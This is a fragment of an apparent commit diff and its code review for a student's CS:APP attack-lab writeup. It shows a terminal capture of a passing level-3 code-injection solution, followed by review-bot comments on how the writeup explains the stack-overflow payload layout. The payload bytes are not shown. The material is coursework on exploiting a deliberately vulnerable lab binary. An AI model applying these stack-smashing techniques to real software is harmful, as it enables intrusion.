jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l3.txt | ./ctarget 
+Cookie: 0x3e8dee8f
+Type string:Touch3!: You called touch3("3e8dee8f")
+Valid solution for level 3 with target ctarget
+PASS: Sent exploit string to server to be validated.
+NICE JOB!
 
+

Phases 1-3 Complete.

-- cgit v1.2.3
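Review bot: in the `@@ -42` hunk of the Markdown file (and in the other fences retagged `bash` in this commit) the block is a terminal capture with a prompt and command output, not a script, so a `bash` highlighter will try to tokenise the prompt and the output as shell syntax. Where the site's highlighter supports it, `console` is the conventional tag for prompt-plus-output captures; `bash` is acceptable if it does not.

Review bot: in the `@@ -238` hunk the new explanation does not match the layout it describes. "Placing the cookie after `touch3` function" reads as after the function's code, but the layout line (`Buffer + Return Address + Touch 3`) puts the cookie after the `touch3` address in the payload; say "after the `touch3` address". The first bullet says that overwriting the return address redirects execution "upon returning (e.g. the beginning of the `touch3` function)", yet in this solution that slot holds the `%rsp` address from phase 2 so the injected `movq`/`retq` runs first, and it is that `retq` that consumes the next 8 bytes, the `touch3` address; drop the `touch3` parenthetical from the first bullet. Also write the total as `0x28` (40 bytes) rather than "28 (hex)" so it matches the `0x28` used in the line that follows, and relabel "Return Address of %rsp (8 bytes)" as "return address slot (8 bytes)".

Review bot: in the `@@ -303` hunk the fence is preceded by a new empty `+` line in addition to the blank context line already there, leaving two blank lines before the ```` ```bash ```` fence; one is enough.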